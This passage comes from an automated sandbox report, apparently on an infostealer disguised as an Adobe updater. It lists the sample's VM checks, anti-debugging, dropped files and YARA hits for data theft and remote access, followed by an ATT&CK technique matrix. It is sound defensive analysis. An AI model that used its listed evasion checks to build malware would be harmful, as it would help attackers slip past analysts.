            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 004E1754h1_2_004E1718
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E31754h15_2_00E31718
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_004E29E2
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,15_2_00E329E2
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_004E2B8C
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: Amcache.hve.1.drBinary or memory string: VMware
            Source: MPGPH131.exe, 0000000A.00000002.4130977280.000000000122A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}%
            Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: xRp.exe, 00000001.00000002.1856041634.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000003.1666399765.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C@
            Source: xRp.exe, 00000001.00000002.1856041634.0000000000898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
            Source: RageMP131.exe, 0000000E.00000003.1932359477.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: AdobeUpdaterV131.exe, 00000000.00000003.1712286461.00000000011BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}0
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&[
            Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
            Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
            Source: MPGPH131.exe, 00000009.00000002.4130830762.0000000001490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.1.drBinary or memory string: vmci.sys
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: MPGPH131.exe, 0000000A.00000002.4126911712.00000000005CD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}d
            Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.000000000117D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}^
            Source: Amcache.hve.1.drBinary or memory string: VMware20,1
            Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: xRp.exe, 0000000F.00000002.2058481763.00000000008A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
            Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
            Source: MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}S
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: AdobeUpdaterV131.exe, 00000000.00000003.1712286461.00000000011BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}y
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4130747747.0000000000F5C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}L
            Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: RageMP131.exe, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
            Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
            Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: MPGPH131.exe, 00000009.00000002.4130830762.0000000001490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
            Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}|
            Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: MPGPH131.exe, 00000009.00000003.1759337474.00000000014A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.AVJ
            Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: MPGPH131.exe, 0000000A.00000002.4130977280.000000000124D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000C.00000002.4131081947.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C0
            Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeAPI call chain: ExitProcess graph end nodegraph_1-1049
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_04FB008C Start: 04FB00B5 End: 04FB005C10_2_04FB008C
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_05140442 Start: 051407BF End: 0514045E14_2_05140442
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: NTICE
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: SICE
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_04F1074F rdtsc 0_2_04F1074F
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_00BC0044 mov eax, dword ptr fs:[00000030h]0_2_00BC0044
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_00634560 mov eax, dword ptr fs:[00000030h]0_2_00634560
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_01050044 mov eax, dword ptr fs:[00000030h]9_2_01050044
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00AC4560 mov eax, dword ptr fs:[00000030h]9_2_00AC4560
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_01050044 mov eax, dword ptr fs:[00000030h]10_2_01050044
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00AC4560 mov eax, dword ptr fs:[00000030h]10_2_00AC4560
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_00B60044 mov eax, dword ptr fs:[00000030h]12_2_00B60044
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_005D4560 mov eax, dword ptr fs:[00000030h]12_2_005D4560
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_00B60044 mov eax, dword ptr fs:[00000030h]14_2_00B60044
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_005D4560 mov eax, dword ptr fs:[00000030h]14_2_005D4560
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "Jump to behavior
            Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
            Source: AdobeUpdaterV131.exe, AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, RageMP131.exe, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: um72Program Manager
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: oum72Program Manager
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006FBF8B GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_006FBF8B
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_004E139F
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: xRp.exe PID: 6568, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xRp.exe PID: 8120, type: MEMORYSTR
            Source: Yara matchFile source: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: AdobeUpdaterV131.exe PID: 6616, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 7416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 7428, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7848, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 8104, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: xRp.exe PID: 6568, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xRp.exe PID: 8120, type: MEMORYSTR
            Source: Yara matchFile source: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: AdobeUpdaterV131.exe PID: 6616, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 7416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 7428, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7848, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 8104, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid Accounts2
            Native API
            1
            Scripting
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            11
            System Time Discovery
            1
            Taint Shared Content
            1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            3
            Obfuscated Files or Information
            LSASS Memory4
            File and Directory Discovery
            Remote Desktop Protocol11
            Input Capture
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            12
            Process Injection
            13
            Software Packing
            Security Account Manager215
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive11
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Registry Run Keys / Startup Folder
            1
            Scheduled Task/Job
            1
            DLL Side-Loading
            NTDS1
            Query Registry
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Registry Run Keys / Startup Folder
            1
            Masquerading
            LSA Secrets651
            Security Software Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts24
            Virtualization/Sandbox Evasion
            Cached Domain Credentials24
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
